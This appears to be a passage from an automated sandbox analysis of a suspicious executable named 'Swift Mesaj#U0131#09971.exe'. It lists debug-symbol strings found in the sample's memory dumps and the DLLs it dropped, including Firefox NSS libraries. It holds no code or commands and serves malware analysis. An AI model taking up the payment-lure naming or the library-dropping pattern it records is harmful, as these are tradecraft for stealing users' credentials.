Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976764480.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7976244573.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019579766.000000001E6D4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981695416.000000001DD0C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021778482.000000001DAEC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996026153.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7996275434.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7973403016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7974385257.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994139478.000000001DD5C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020950343.000000001DA9C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7994673416.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7964033774.000000001DD10000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015685124.000000001E658000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7963399838.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015801612.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015552938.000000001E654000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020249501.000000001DA70000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7987166435.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7988457162.000000001DD24000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7981094274.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019472505.000000001E6D0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: msvcp140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7997374379.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7998188833.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.4.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7975695387.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.4.dr
Source: Binary string: ucrtbase.pdbUGP source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8011268620.000000001E710000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8008974466.000000001E830000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7967762388.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7977493803.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7978161221.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7962442056.0000000000178000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015209271.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027706325.0000000000060000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015406629.000000001E650000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019321202.000000001E6CC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7980183891.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016652920.000000001E680000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8015969591.000000001E66C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7970034391.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016183556.000000001E670000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971102874.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016323485.000000001E674000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016445473.000000001E678000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971021047.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7969234016.000000001DD04000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016567401.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.4.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7984985942.000000001DD18000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7985166767.000000001DD1C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8006844600.000000001D49C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.4.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7971951549.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.4.dr
Source: Binary string: vcruntime140.i386.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030240707.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8027339216.000000001DCC4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8014829170.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019922656.000000001E6F4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020103114.000000001E6F8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.7986103075.000000001DD08000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.7992634785.000000001DD00000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020892239.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8020774715.000000001DA8C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.4.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017382562.000000001E694000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018771752.000000001E6B4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018457895.000000001E6A8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018618086.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018284897.000000001E6A4000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8088355809.000000001DE90000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018902003.000000001E6B8000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017632938.000000001E698000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8018095625.000000001E6A0000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8016718695.000000001E68C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8019101053.000000001E6BC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017886333.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8017109359.000000001E690000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.4.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005301719.000000001D47C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8025045932.000000001DB7C000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8021957690.000000001DB14000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8026822739.000000001DCAC000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.4.dr
